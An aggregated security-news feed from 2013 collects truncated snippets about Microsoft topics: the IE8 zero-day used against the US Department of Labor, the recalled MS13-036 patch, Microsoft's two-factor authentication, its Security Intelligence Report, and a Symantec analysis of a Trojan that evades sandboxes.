rated Important and cover Denial of Service, Spoofing and Elevation of Privilege vulnerabilities Bulletins 5, 6, and 7 are http://www.secuobs.com/revue/news/444526.shtmlhttp://www.secuobs.com/revue/news/444526.shtml 2013-05-09 19:34:07 - Fortinet Blog News and Threat Research All Posts : Are you using Internet Explorer 8 If so, you need to read on A recent zero-day exploit being actively used in the wild and was likely the cause of a watering-hole attack attack that was launched from the US Department of Labor To help IE8 users mitigate any further exposure to attacks from this flaw, Microsoft released a quick fix solution to address the exploit Microsoft is still working on a complete fix for the exploit In the interim, if you re using IE8, click here to head t http://www.secuobs.com/revue/news/444458.shtmlhttp://www.secuobs.com/revue/news/444458.shtml 2013-05-09 17:30:50 - Computer Security News : Microsoft has released a temporary fix for a zero-day vulnerability in Internet Explorer 8, which was used by hackers in a prominent attack against the US Department of Labor's website http://www.secuobs.com/revue/news/444426.shtmlhttp://www.secuobs.com/revue/news/444426.shtml 2013-05-09 15:32:15 - Dark Reading All Stories : 'Fix it' now available as a temporary defense until actual patch is ready only IE 8 is affected by flaw http://www.secuobs.com/revue/news/444410.shtmlhttp://www.secuobs.com/revue/news/444410.shtml 2013-05-09 15:05:22 - ZDNet Zero Day Blog RSS : Users running Internet Explorer 8 an estimated 23 percent of all IE users should update their systems with an out-of-band emergency patch to prevent a zero-day flaw IMAGE http://www.secuobs.com/revue/news/444405.shtmlhttp://www.secuobs.com/revue/news/444405.shtml 2013-05-09 13:19:31 - SANS Internet Storm Center InfoCON green : ------ Johannes B Ullrich, Ph more http://www.secuobs.com/revue/news/444386.shtmlhttp://www.secuobs.com/revue/news/444386.shtml 2013-05-09 13:15:29 - Help Net Security News : Microsoft has released a one-click Fix it for mitigating the effect of the IE 8 zero-day vulnerability that is being used in watering hole attacks in the wild Given that a Metaspolit module explo http://www.secuobs.com/revue/news/444381.shtmlhttp://www.secuobs.com/revue/news/444381.shtml 2013-05-09 12:21:27 - Security Bloggers Network : The recent and widely reported US Dept of Labor website hack turned out to be a zero-day exploit against IE Good news Microsoft just published an emergency Fix it patch against the vulnerability http://www.secuobs.com/revue/news/444369.shtmlhttp://www.secuobs.com/revue/news/444369.shtml 2013-05-09 05:25:58 - Ars Technica Risk Assessment : IE 8 users your Fix it is ready ColdFusion admins put system in lock down now http://www.secuobs.com/revue/news/444338.shtmlhttp://www.secuobs.com/revue/news/444338.shtml 2013-05-08 18:19:16 - Dark Reading All Stories : Adds Hyper-V support to XTMv unified threat management UTM platform http://www.secuobs.com/revue/news/444224.shtmlhttp://www.secuobs.com/revue/news/444224.shtml 2013-05-07 23:52:30 - CNIS mag : La 14ème édition du Security Intelligence Report de Microsoft vient de paraître Ce rendez-vous régulier est une photographie du paysage des malwares actifs visant les plateformes Windows, et portant sur les statistiques anonymisées renvoyées par les outils de protection des systèmes Microsoft, soit près d un milliard de points de mesure répartis dans le monde Le http://www.secuobs.com/revue/news/444063.shtmlhttp://www.secuobs.com/revue/news/444063.shtml 2013-05-07 22:58:35 - CNIS mag : Le paradoxe est aussi criant qu une manifestation pour le désarmement organisée par le Parti Communiste dans les années 50 Microsoft se lance dans une campagne ayant pour thème la préservation et la défense des données personnelles, campagne qui débute par un questionnaire relativement indiscret sur les us et coutumes des internautes C est là le http://www.secuobs.com/revue/news/444057.shtmlhttp://www.secuobs.com/revue/news/444057.shtml 2013-05-07 20:15:55 - Dark Reading All Stories : Solution offers real-time protection of the entire server operating and file system http://www.secuobs.com/revue/news/444035.shtmlhttp://www.secuobs.com/revue/news/444035.shtml 2013-05-06 20:13:08 - Security Bloggers Network : I was in Tokyo a couple of weeks back, talking to people about the latest Microsoft Security Intelligence Report According to the report, Japan continues to have one of the lowest malware infection rates in the world, as seen in Figure 1 http://www.secuobs.com/revue/news/443810.shtmlhttp://www.secuobs.com/revue/news/443810.shtml 2013-05-06 14:52:10 - Les derniers documents du CERTA. : Une vulnérabilité a été découverte dans Microsoft Internet Explorer 8 Elle permet une exécution de code arbitraire à distance au moyen d'une page Web spécialement conçue Les versions 6, 7, 9 et 10 de Microsoft Internet Explorer ne sont pas affectées par cette vulnérabilité http://www.secuobs.com/revue/news/443747.shtmlhttp://www.secuobs.com/revue/news/443747.shtml 2013-05-05 14:19:42 - Security Bloggers Network : Yesterday Microsoft published security advisory KB2847140 about an exploit for 0-day vulnerability CVE-2013-1347 in Internet Explorer 8 The exploit is in active use in the wild, for example on the compromised website at the US Department of Labor earlier this week, Initially the website was widely reported be exploiting a known vulnerability in Internet Explorer to install the remote access tool Poison Ivy Screen Shot 2013-05-04 at 65057 PMpng However yesterday Invincea showed in a blog post that even a fully patched Internet Explorer falls prey to the attack, making the attack a legitimate 0-day Microsoft's recommends installing EMET to mitigate the vulnerability or to disabling active scripting Alternatively one can upgrade to Internet Explorer 9 which is not affected by the vulnerability We will update this blog post as soon as we get more information on the vulnerablity and possible mitigation steps Microsoft Patch Tuesday is only 10 days away and we know that new Internet Explorer versins are coming, as they address the vulnerabilities disclosed during the recent PWN2OWN competation in Vancouver at CanSecWest It will be challenging to get a fix integrated into these new Internet Explorer versions in time for Patch Tuesday Stay tuned for more as we get more information next week http://www.secuobs.com/revue/news/443612.shtmlhttp://www.secuobs.com/revue/news/443612.shtml 2013-05-02 20:10:47 - Security Bloggers Network : I just checked out Microsoft s Two-Factor Authentication and I have to say, I m a little disappointed While I am happy that they now offer two-factor authentication, there needs to be a balance between security and usability in order for people to adopt it First let s talk about the original factor, your password While Microsoft requires passwords be at least 8 characters in length and have at least 2 variations in type upper, lower, number and symbol , it puts a cap on passwords of 16 characters which is a little short for me I prefer to use longer passphrases for extra security, and I just don t understand why anyone has to put a cap on my password length in the year 2013Image Microsoft Next let s talk about the authenticator There are a few authenticators out there many are familiar with the Google Authenticator which is available on Android, iOS and BlackBerry, which you can use with your Microsoft account If you have a Windows Phone however, you will need to use Microsoft s authenticator app If you can use another authenticator, why not just do it for every device It's much more convenient when the user can choose the app that works for them Moving on to App Passwords, you may use your Microsoft live account to sign into other applications like on your phone Some apps may not be able to prompt you for a security code, or it wouldn t be reasonable to require a code each time it logs in For these cases, you have to use an App Password This is not uncommon, but what I found interesting is I can generate as many App Passwords as I want, but I can t name them nor can I view a list of the previous app passwords that were generated After setting up Two-Factor Authentication with my Google accounts, I am able to create an App-Specific Password and Google requires me to name it That way, if I ever want to revoke access to Outlook or my Android, I can do so with a few clicks Unfortunately, because Microsoft doesn t allow me to give names to app passwords, if I ever want to revoke access to an individual application, my only option is to remove all issued App Passwords and start over from scratch, bumping all my applications offline Allowing for Trusted Devices is another key to successful adoption of two-factor authentication Users shouldn t be expected to enter a security code when logging into their account from their personal computers this is one of the compromises we make in order to increase usability That being said, Microsoft should allow users to label their trusted devices and allow users to revoke access to a device, just like App Passwords Comparing again to Google, while I am not able to see a list of all trusted devices in my Google settings, I do have the ability to revoke trust to the computer I am logged in with Facebook Security Settings Both Google and Microsoft could take a page from Facebook's security by asking users to name new devices as they are detected and allowing them to be revoked individually Sadly, Microsoft doesn t even allow you to revoke access to the computer you are currently using you may only revoke all devices and start over again Lastly, if you lose access to your authenticator, what will you do Microsoft doesn t currently provide any way of downloading offline passwords and if you lose your authenticator and all alternative devices, you will be force to enter new devices and wait 30 days for the old devices to be deleted This could be mitigated by allowing users to download a recovery key or offline codes Overall, this is a step in the right direction for Microsoft and it s great that they have finally caught up with the likes of Apple and Google, but it does appear they have some improvements to make That being said, this shouldn t hold you back from enabling Two-Factor Authentication because it s much more secure than relying solely on a password IMAGE IMAGE http://www.secuobs.com/revue/news/443201.shtmlhttp://www.secuobs.com/revue/news/443201.shtml 2013-05-02 15:58:09 - Help Net Security News : Cyber scammers continue to impersonate Microsoft and try to trick users into believing that their computer is serious need of an AV solution Webroot researchers have spotted an active campaign tha http://www.secuobs.com/revue/news/443142.shtmlhttp://www.secuobs.com/revue/news/443142.shtml 2013-05-01 18:34:47 - 4sysops : A picture of Kyle Beckman Kyle Beckman - 0 comments Kyle Beckman works as a systems administrator in Higher Education in the Southeast United States He is an MCSE and specializes in Group Policy, Windows Server, and client support This year s Microsoft Management Summit in Las Vegas, NV started off with more excitement than I m sure the everyone was hoping for Copyright 2006-2013, 4sysops, Digital fingerprint 3db371642e7c3f4fe3ee9d5cf7666eb0 http://www.secuobs.com/revue/news/442943.shtmlhttp://www.secuobs.com/revue/news/442943.shtml 2013-04-30 23:11:49 - Security Bloggers Network : By Roy Tobin Recently we have seen an increase in fake Microsoft scams, which function by tricking people into thinking that their PC is infected With these types of scams there are a number of things to remember 1 Microsoft will never call you telling you that your PC is infected 2 Never allow strangers IMAGE http://www.secuobs.com/revue/news/442808.shtmlhttp://www.secuobs.com/revue/news/442808.shtml 2013-04-30 17:09:01 - Security Musings : One of the lesser-known features of Windows 8 is the ability to sync a number of your settings for your system with your Microsoft account This means you can sync your apps, your people including Facebook, Twitter, Outlook, and LinkedIn contacts , and your photos so that they all appear no matter which Windows 8 system http://www.secuobs.com/revue/news/442733.shtmlhttp://www.secuobs.com/revue/news/442733.shtml 2013-04-27 15:28:58 - Slashdot Your Rights Online : reifman writes The Seattle Times reports, 'For the first time in state history, the Washington state budget is being written by Microsofties,' Representative Ross Hunter has 'tamed his Microsoft-style head-butting with a politician's trust-building' Senator Andy Hill is 'the first Senate budget chair ever to request Excel files instead of paper spreadsheets' 'The two must find 1 billion in new money for the state's K-12 system' Unfortunately, The Times neglects to mention that Hunter and Microsoft are among those behind the deficit and cutbacks in the first place Hunter helped pass the amnesty bill for Microsoft's 15 billion Nevada tax dodge 437 billion if you include impacts from its lobbying to reduce tax rates that contributed to 4 billion in cuts to K-12 and higher education since 2008 The state has resorted to using Yelp to tax dancing to try to make up the shortfall for real IMAGE IMAGE Share on Google Read more of this story at Slashdot IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/442237.shtmlhttp://www.secuobs.com/revue/news/442237.shtml 2013-04-26 16:15:39 - Symantec Connect Security Response Billets : Recently, I discovered a back door Trojan horse program that does not work on Microsoft Windows XP I would like to present some of the details of this threat, especially as the malware author encoded a special trick into the functionality of the Trojan The trick appears to have been designed to allow the threat be used in targeted attacks The fseek function In this threat, the author uses the fseek function, which is unusual as it is normally used to process data For example, if the program reads 100 bytes of data from the top of the file, the fseek function process is used to move the 100 bytes Loop-clip_2png Figure 1 The fseek code trick used by the malware However, in the case of this Trojan, there are three functions that continue in a loop 1 Append one string to another string strcat 2 Move zero bytes from the end of the file fseek 3 Split a string into tokens strtok Usually, code reads or writes data after the fseek function, but in this case this process does not happen It is also strange that such a function is written in a loop Looking at the code in greater detail, the fseek function works with a NULL pointer as a file handle This means that there is no file to control Because the fseek function controls a non-existent file, the threat crashes when it is executed on Microsoft Windows XP Error_message_443pxpng Figure 2 The threat crashes when it runs on Microsoft Windows XP If the file is executed on Microsoft Windows Vista or later, it works fine So what is the difference between Microsoft Windows XP and later versions of Windows According to the MSDN Library for Microsoft Visual Studio 2005 or later, the fseek function is documented as follows If stream is a null pointer, or if origin is not one of allowed values described below, fseek and _fseeki64 invoke the invalid parameter handler, as described in Parameter Validation If execution is allowed to continue, these functions set errno to EINVAL and return -1 However, there is no mention of this in the Microsoft Visual Studio NET 2003 MSDN Library I think the fseek code changed when a file handle with a NULL pointer is passed as a parameter to the function The malware author used this change intentionally in order to create a program that doesn't run on Microsoft Windows XP Microsoft Windows XP has just under 40pourcents usage share of the operating system market as of March 2013 If a malware author creates a program that doesn't run on Microsoft Windows XP, valuable opportunities to compromise a large number of computers will be lost So, why would someone create malware such as this Why not run on Microsoft Windows XP One possibility is an attempt to avoid revealing the true behavior of the threat in sandboxes I submitted a sample file to eight Automated Threat Analysis Systems found on the Internet and none of these systems logged the sample file behavior I believe the reason for this is that the malicious code is found after the fseek function trick If the sandboxes used for testing samples ran on Microsoft Windows Vista, or rather any operating system later than Microsoft Windows XP, they may not have logged the malware's behavior Please see this blog for further details regarding how Automated Threat Analysis Systems are used by antivirus companies to analyze malware If malware runs without performing any destructive or disruptive activities in silence, it can continue to compromise computers for a long time, for which the merits to the malware author cannot be overstated Back door Trojan horse programs usually check the operating system, CPU clock, and the installed antivirus product, if any This threat is unusual because it also gathers the following information Whether the compromised computer has a wireless network card The dynamic random-access memory DRAM type, such as Synchronous DRAM, Cache DRAM, 3DRAM, or SDRAM The BIOS manufacturer settings, serial number, and version The printer caption The battery description and device ID Normally malware authors wouldn't worry about the battery on the computer However, the author of this threat evidently has a strong interest in the targeted company Conclusion At the time of writing this blog, Symantec has only received two samples of this threat from large customers and no major infections have been recorded From what I can gather from my analysis of this threat, it was used in a targeted attack and the author knew that the targeted company uses Microsoft Windows Vista or later on their computers and hence attempted to infect their network with malware that does not work on Microsoft Windows XP If the administrator of the targeted company were to notice suspicious behavior in a suspect file and decide to test it on an Automated Threat Analysis System, it is possible that malicious activity may not be seen at all during the testing and the administrator would be none-the-wiser about the file's true behavior Symantec will continue to monitor malicious code and techniques outlined in this blog We also recommend that users not run suspicious programs and keep their operating system and antivirus software up to date http://www.secuobs.com/revue/news/442075.shtmlhttp://www.secuobs.com/revue/news/442075.shtml 2013-04-26 00:54:55 - Soroush Dalili Computer Security Is My Interest : While I was testing a XML Injection vulnerability, I became interested in the W3Schools DTD Validator example that can only work in IE http wwww3schoolscom dtd dtd_validationasp As a result, after I finished my testing, I started playing with this Microsoft XMLDOM object to see if it is vulnerable I created the following test case to manipulate the http://www.secuobs.com/revue/news/441953.shtmlhttp://www.secuobs.com/revue/news/441953.shtml 2013-04-24 23:56:28 - Slashdot Your Rights Online : An anonymous reader writes In its continuing march toward locking up deals with every major Android and Chrome device maker, Microsoft announced on Tuesday a patent-licensing agreement with Chinese manufacturer ZTE This follows a similar deal last week with the parent company of Foxconn Microsoft's Deputy General Counsel Horacio Gutierrez said, 'Much of the current litigation in the so called 'smartphone patent wars' could be avoided if companies were willing to recognize the value of others creations in a way that is fair At Microsoft, experience has taught us that respect for intellectual property rights is a two-way street, and we have always been prepared to respect the rights of others just as we seek respect for our rights This is why we have paid others more than 4 billion over the last decade to secure intellectual property rights for the products we provide our customers' IMAGE IMAGE Share on Google Read more of this story at Slashdot IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/441679.shtmlhttp://www.secuobs.com/revue/news/441679.shtml 2013-04-24 20:54:03 - Vigilance vulnérabilités publiques : Un attaquant peut provoquer un Cross Site Scripting dans Microsoft SharePoint Server 2010, afin d'exécuter du code JavaScript dans le contexte du site web http://www.secuobs.com/revue/news/441638.shtmlhttp://www.secuobs.com/revue/news/441638.shtml 2013-04-24 20:07:37 - Vigilance vulnérabilités publiques : Un attaquant authentifié peut accéder à certains documents de Microsoft SharePoint Server, qui sont normalement protégés par un contrôle d'accès http://www.secuobs.com/revue/news/441623.shtmlhttp://www.secuobs.com/revue/news/441623.shtml 2013-04-24 13:54:55 - Network World on Security : Microsoft today re-released a security update that had crashed customers' PCs and crippled the machines with endless reboots, saying that the revised patch is now safe to install http://www.secuobs.com/revue/news/441508.shtmlhttp://www.secuobs.com/revue/news/441508.shtml 2013-04-23 15:02:08 - Network World on Security : Microsoft has launched yet another privacy awareness campaign, but this time around, the company decided to focus more on its own privacy right-doings rather than Google's alleged wrongdoings Declaring your privacy is our priority, the campaign runs online, in print, and on TV, billing Microsoft as the good guy of online privacy and offering educational resources for those who want to better control what they share online http://www.secuobs.com/revue/news/441271.shtmlhttp://www.secuobs.com/revue/news/441271.shtml 2013-04-23 08:16:50 - SANS Internet Storm Center InfoCON green : Full disclosure I work at Microsoft This past Thursday 17 APR Microsoft release more http://www.secuobs.com/revue/news/441191.shtmlhttp://www.secuobs.com/revue/news/441191.shtml 2013-04-22 15:09:57 - LinuxSecurity.com Latest News : LinuxSecuritycom A Spanish Linux software group has filed a complaint against Microsoft to the European Commission over its controversial implementation of UEFI Secure Boot for Windows 8 hardware http://www.secuobs.com/revue/news/440989.shtmlhttp://www.secuobs.com/revue/news/440989.shtml 2013-04-19 21:09:54 - Network World on Security : Microsoft's latest security report has found that Web-based attacks pose the greatest threat to companies, giving credence to efforts to develop browser alternatives to accessing the Internet http://www.secuobs.com/revue/news/440703.shtmlhttp://www.secuobs.com/revue/news/440703.shtml 2013-04-19 16:59:55 - 411 spyware : Almost every computer user is familiar with some type of online fraud which he or she may encounter It could be drive-by download, phishing websites or spam emails Recently it has been noticed that computer users start complaining about fake phone calls which are said to be related to Microsoft Windows operating system The users http://www.secuobs.com/revue/news/440636.shtmlhttp://www.secuobs.com/revue/news/440636.shtml 2013-04-19 16:37:27 - Security Bloggers Network : As a IT Security company, SecureAuth encourages all activities to increase internet security And the recent announcement of the Microsoft 2-Factor Authentication for Microsoft accounts is in the right direction What Microsoft 2-Factor Verification Brings User Control This is the basis of the Microsoft offering Delivering optional added security see image 1 to the host http://www.secuobs.com/revue/news/440634.shtmlhttp://www.secuobs.com/revue/news/440634.shtml 2013-04-19 15:45:19 - Ars Technica Risk Assessment : Java 8 being delayed into the first quarter of 2014 http://www.secuobs.com/revue/news/440618.shtmlhttp://www.secuobs.com/revue/news/440618.shtml 2013-04-19 14:59:38 - Security Bloggers Network : Yesterday, Microsoft released volume 14 of its Security Intelligence Report SIRv14 which included new threat intelligence from over a billion systems worldwide The report was focused on the 3rd and 4th quarters of 2012 One of the most interesting threat trends to surface in the enterprise environment was the decline in network worms and rise of web-based attacks The report found The proportion of Conficker and Autorun threats reported by enterprise computers each decreased by 37pourcents from 2011 to 2H12 In the second half of 2012, 7 out of the top 10 threats affecting enterprises were associated with malicious or compromised websites Enterprises were more likely to encounter the iFrame redirection technique than any other malware family tracked in 4Q12 One specific iFrame redirection family called IframeRef, increased fivefold in the fourth quarter of 2012 to become the number one malicious technique encountered by enterprises worldwide IframeRef was detected nearly 33 million times in the fourth quarter of 2012 The report also takes a close look at the dangers of not using up-to-date antivirus software in an article titled Measuring the Benefits of Real-time Security Software New research showed that, on average, computers without AV protection were five and a half times more likely to be infected The study also found that 25 out of 10, or an estimated 270 million computers worldwide were not protected by up-to-date antivirus software Whilst many of the findings surrounding real-time protection seem pretty obvious, the numbers are pretty startling As security is often best implemented using a strength-in-depth, or rings approach, anti-virus or real time malware detection seems to be taking a back seat For mobile devices, or devices based on Linux this can become a significant issue, especially if those devices carry email destined for Microsoft based machines By Simon Moffatt IMAGE http://www.secuobs.com/revue/news/440612.shtmlhttp://www.secuobs.com/revue/news/440612.shtml 2013-04-19 04:55:10 - Security Bloggers Network : Yesterday, Microsoft released volume 14 of its Security Intelligence Report SIRv14 which includes new threat intelligence from over a billion systems worldwide One of the most interesting threat trends to surface in the enterprise environment was the decline in network worms and rise of web-based attacks The report found The proportion of Conficker and Autorun threats reported by enterprise computers each decreased by 37pourcents from 2011 to 2H12 In the second half of 2012, 7 out of the top 10 threats affecting enterprises were associated with malicious or compromised websites Enterprises were more likely to encounter the iFrame redirection technique than any other malware family tracked in 4Q12 One specific iFrame redirection family called IframeRef, increased fivefold in the fourth quarter of 2012 to become the number one malicious technique encountered by enterprises worldwide IframeRef was detected nearly 33 million times in the fourth quarter of 2012 The report also takes a close look at the dangers of not using up-to-date antivirus software in an article titled Measuring the Benefits of Real-time Security Software New research showed that, on average, computers without AV protection were five and a half times more likely to be infected The study also found that 25 out of 10, or an estimated 270 million computers worldwide were not protected by up-to-date antivirus software With the report s release they are reminding customers of the importance antivirus software can provide in protecting systems For more information, check out this blog post Of course these are just some of the more interesting threat trends I thought might be of interest The full Security Intelligence Report, volume 14, is available for free and can be downloaded here IMAGE http://www.secuobs.com/revue/news/440540.shtmlhttp://www.secuobs.com/revue/news/440540.shtml 2013-04-18 23:25:03 - SANS Internet Storm Center InfoCON green : more http://www.secuobs.com/revue/news/440501.shtmlhttp://www.secuobs.com/revue/news/440501.shtml 2013-04-18 19:58:58 - Help Net Security News : Microsoft has announced that it will be upgrading the Microsoft account and that this upgrade will include an optional two-step verification feature More than a year ago, we began bringing two-st http://www.secuobs.com/revue/news/440448.shtmlhttp://www.secuobs.com/revue/news/440448.shtml 2013-04-18 14:52:56 - Network World on Security : Following similar initiatives by Apple, Google and Facebook, Microsoft is enabling two-factor authentication for its Microsoft Account service, the log-on service for many of its online and desktop products http://www.secuobs.com/revue/news/440377.shtmlhttp://www.secuobs.com/revue/news/440377.shtml 2013-04-18 03:14:25 - Computer Security News : There has been a growing need for a two-step system since the launch of Windows 8, Windows RT and Windows Phone 8 which rely on a single user account http://www.secuobs.com/revue/news/440300.shtmlhttp://www.secuobs.com/revue/news/440300.shtml 2013-04-18 00:42:52 - Dark Reading All Stories : Conficker finally flickering out, newest edition of Microsoft's Security Intelligence Report SIR shows http://www.secuobs.com/revue/news/440281.shtmlhttp://www.secuobs.com/revue/news/440281.shtml 2013-04-17 19:16:50 - Ars Technica Risk Assessment : Microsoft scheme uses the same tech as Google's two-factor authentication http://www.secuobs.com/revue/news/440076.shtmlhttp://www.secuobs.com/revue/news/440076.shtml 2013-04-17 18:26:47 - Security Bloggers Network : By Adrienne Hall, general manager, Trustworthy Computing Today Microsoft releases volume 14 of the Microsoft Security Intelligence Report, which provides trends and insights on security vulnerabilities, exploit activity, malware and potentially unwant http://www.secuobs.com/revue/news/440061.shtmlhttp://www.secuobs.com/revue/news/440061.shtml 2013-04-17 17:36:28 - Security Bloggers Network : We released the latest volume of the Microsoft Security Intelligence Report today that provides a large body of new data and analysis on the threat landscape Volume 14 focuses on what the threat landscape looked like in the second half of 2012, http://www.secuobs.com/revue/news/440038.shtmlhttp://www.secuobs.com/revue/news/440038.shtml 2013-04-17 15:14:35 - Slashdot Your Rights Online : Pikoro writes with news that Foxconn's parent company has entered in an agreement to pay Microsoft royalties for every Android device they manufacture, joining a rather long list of companies licensing patents for Android Linux from Microsoft From the BBC Microsoft has secured a patent deal with the world's biggest consumer electronics manufacturer to receive fees for devices powered by Google's Android and Chrome operating systems Hon Hai the parent company of Foxconn said the deal would help prevent its clients being caught up in an ongoing intellectual property dispute Microsoft says that Google's code makes use of innovations it owns Google alleges its rival's claims are based on 'bogus patents' 'The patents at issue cover a range of functionality embodied in Android devices that are essential to the user experience, including natural ways of interacting with devices by tabbing through various screens to find the information they need surfing the web more quickly, and interacting with documents and e-books' IMAGE IMAGE Share on Google Read more of this story at Slashdot IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/440000.shtmlhttp://www.secuobs.com/revue/news/440000.shtml 2013-04-17 13:30:52 - Security Bloggers Network : Foxconn's mom licenses patents Microsoft trolls another Android scalp Hon Hai caves in to Ballmer's IP claims Microsoft NASDAQ MSFT licenses patents to Hon Hai Precision Industry TPE 2317 , for its Chrome OS and Android ODM activities As usual, there's no word on how much money's changing hands As usual, we don't know which patents are being licensed In IT Blogwatch, bloggers mutter darkly, as usual ITBW for Computerworld StupidBallmerMemeAsUsual http googl news 2Ghq attached image IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/439974.shtmlhttp://www.secuobs.com/revue/news/439974.shtml 2013-04-17 05:34:10 - ZDNet Zero Day Blog RSS : An amendment to CISPA failed to pass This now means major tech and Web companies will be disallowed under law to promise to protect your privacy IMAGE http://www.secuobs.com/revue/news/439912.shtmlhttp://www.secuobs.com/revue/news/439912.shtml 2013-04-16 13:36:23 - Network World on Security : Microsoft researchers have developed the prototype of a client-side architecture that would replace the Web browser with a much more secure virtualized environment that isolates Web applications http://www.secuobs.com/revue/news/439719.shtmlhttp://www.secuobs.com/revue/news/439719.shtml 2013-04-16 13:30:39 - CNIS mag : Le document n est peut-être pas parfait, mais il peut être utile aux responsables sécurité rencontrant quelques problèmes sémantiques lors des inévitables échanges qui opposent gestionnaires d entreprise et RSSI CSO Pour eux, Microsoft a pondu une série de fiches d information génériques rédigées en langage stratégique qui, une fois expurgées des paragraphes publicitaires pas du tout subliminaux, peuvent http://www.secuobs.com/revue/news/439713.shtmlhttp://www.secuobs.com/revue/news/439713.shtml 2013-04-16 03:01:59 - Channel 9 : It's a special treat this week and we actually had Paul IN the studio, just like old times He was in Seattle anyway- it's not like he came to Seattle just to visit Ping He likes us, but let's not go overboard BUILD has been built 04 10 Xbox music streams 11 59 XP going buh-bye 07 48 PARTY in Utah 14 11 IMAGE http://www.secuobs.com/revue/news/439643.shtmlhttp://www.secuobs.com/revue/news/439643.shtml 2013-04-16 01:59:44 - Dark Reading All Stories : This downloader is also the payload http://www.secuobs.com/revue/news/439636.shtmlhttp://www.secuobs.com/revue/news/439636.shtml 2013-04-15 19:55:10 - Security Bloggers Network : an posting from NBC news in there Technology section A security update that Microsoft pushed out earlier this week crashes some Windows 7, Windows Server 2008 and Windows Vista machines, forcing them into an endless cycle of reboots that can only be stopped by repairing the operating systems Microsoft recommends that all Windows 7 users uninstall the security update The update came as http://www.secuobs.com/revue/news/439590.shtmlhttp://www.secuobs.com/revue/news/439590.shtml 2013-04-15 14:24:33 - Security Bloggers Network : Here's the Microsoft smart watch AGAIN Take two Redmond to resurrect SPOTwatch Microsoft NASDAQ MSFT is said to be working on a smartwatch That's 10 years since it tried to excite people with Smart Personal Object Technology SPOT In IT Blogwatch, bloggers suffer some déjà vu MSFT ITBW for Computerworld spot spot2 http googl news 7fup attached image IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/439500.shtmlhttp://www.secuobs.com/revue/news/439500.shtml 2013-04-13 21:46:04 - Security Bloggers Network : Microsoft has recommended holding off on installing the MS13-036 security update due to incompatibilities with certain software that can cause the dreaded blue screen of death And if your organization already has the patch installed, they urge its uninstallation if possible Microsoft originally pushed the offending patch this past Tuesday to address four vulnerabilities in the Windows kernel-mode driver It s ashamed when stuff like this happens We as an industry have a goal of convincing organizations to patch faster But then something like this pops up and we risk loosing momentum Bad patches like MS13-036 are very rare the last time this officially happened to Microsoft was way back in 2008 It s important for us to continue to emphasize to IT decision makers that patching quickly in almost all cases outweighs the potential consequences of the once-in-a-blue-moon bad patch via KrebsOnSecuritycom Microsoft is urging users to who haven t installed it yet to hold off on MS13-036, a security update that the company released earlier this week to fix a dangerous security bug in its Windows operating system The advice comes in response to a spike in complaints from Windows users who found their machines unbootable after applying the update crackedwinThe MS13-036 http://www.secuobs.com/revue/news/439329.shtmlhttp://www.secuobs.com/revue/news/439329.shtml 2013-04-12 20:57:40 - Ars Technica Risk Assessment : Patch causes some machines to become unbootable, company warns http://www.secuobs.com/revue/news/439214.shtmlhttp://www.secuobs.com/revue/news/439214.shtml 2013-04-12 18:22:18 - Security Bloggers Network : Microsoft is urging users to who haven t installed it yet to hold off on MS13-036, a security update that the company released earlier this week to fix a dangerous security bug in its Windows operating system The advice comes in response to a spike in complaints from Windows users who found their machines unbootable after applying Related Posts Microsoft Issues Fix for Zero-Day IE Flaw Fat Patch Tuesday Critical Updates for Windows, Adobe Flash, Air Critical Fixes for Windows, Flash Shockwave Microsoft Fixes Zero-Day, Four Other Flaws in IE http://www.secuobs.com/revue/news/439189.shtmlhttp://www.secuobs.com/revue/news/439189.shtml 2013-04-12 17:32:11 - Security Bloggers Network : Microsoft has recalled part of an update that was release earlier this week as part of April s Patch Tuesday Microsoft discovered that in some cases users that had installed the update and had certain other third party installed may experience a blue screen with an Event ID 55 or a 0xc000021a Stop error after restarting As a result Microsoft has pulled the part of MS12-036 that causes the problem and is asking users who may have already installed to the update to remove it Microsft has published more information about how to remove the update here http supportmicrosoftcom kb 2839011 Microsoft is working http://www.secuobs.com/revue/news/439178.shtmlhttp://www.secuobs.com/revue/news/439178.shtml 2013-04-12 15:21:35 - Dark Reading All Stories : Taking a cue from virtualized datacenters, Microsoft researchers envision a browser architecture that isolates Web apps from each other to strengthen security http://www.secuobs.com/revue/news/439153.shtmlhttp://www.secuobs.com/revue/news/439153.shtml 2013-04-12 15:18:48 - threatpost The First Stop for Security News : Microsoft announced last night that it has stopped pushing a security update originally released on Patch Tuesday because the fix is causing some PCs to blue screen Microsoft recommends users uninstall the patch, which is also causing compatibility with some endpoint security software read more http://www.secuobs.com/revue/news/439152.shtmlhttp://www.secuobs.com/revue/news/439152.shtml 2013-04-12 13:43:23 - Network World on Security : Microsoft has amended a security update containing a patch that reportedly caused errors in some third-party software http://www.secuobs.com/revue/news/439134.shtmlhttp://www.secuobs.com/revue/news/439134.shtml 2013-04-12 13:10:58 - ZDNet Zero Day Blog RSS : Microsoft is recommending an update released on Patch Tuesday be uninstalled IMAGE http://www.secuobs.com/revue/news/439123.shtmlhttp://www.secuobs.com/revue/news/439123.shtml 2013-04-12 12:17:21 - Security Bloggers Network : Microsoft has advised all users of Windows 7 who installed a security update to uninstall it, after some customers found their computers would not restart or applications would not load http://www.secuobs.com/revue/news/439114.shtmlhttp://www.secuobs.com/revue/news/439114.shtml 2013-04-12 00:52:23 - Security Bloggers Network : We've written recently about Apple and Automattic starting to offer two-factor authentication 2FA for online accounts Word on the street says that Microsoft will soon be doing the two-step, too http://www.secuobs.com/revue/news/439049.shtmlhttp://www.secuobs.com/revue/news/439049.shtml 2013-04-11 22:23:08 - Security Bloggers Network : Cybersecurity continues to be a hot topic around the world, particularly as governments develop policies to improve cybersecurity in critical infrastructure In the US, the White House released an Executive Order entitled Improving Critical Infrastru http://www.secuobs.com/revue/news/439032.shtmlhttp://www.secuobs.com/revue/news/439032.shtml 2013-04-11 20:38:06 - Security Bloggers Network : Happy April Patch Tuesday Microsoft has released nine bulletins with 14 CVEs It s a bit boring this month, but that s an excellent thing for IT security teams because there won t be a mad dog rush to get everything deployed Only two of the nine bulletins this month are critical Even today s IE bulletin, the usual candidate for the patch immediately award, only has an exploit index rating of two -- indicating that Microsoft believes building a successful attack in the next 30 days will be difficult The second critical bug, vulnerability in the ActiveX controls for the remote desktop client MS13-029 , presents a more interesting attack scenario Fortunately, there are enough mitigating circumstances to make it less problematic for most businesses The bug doesn t affect the latest RDP client, version 8, which dramatically 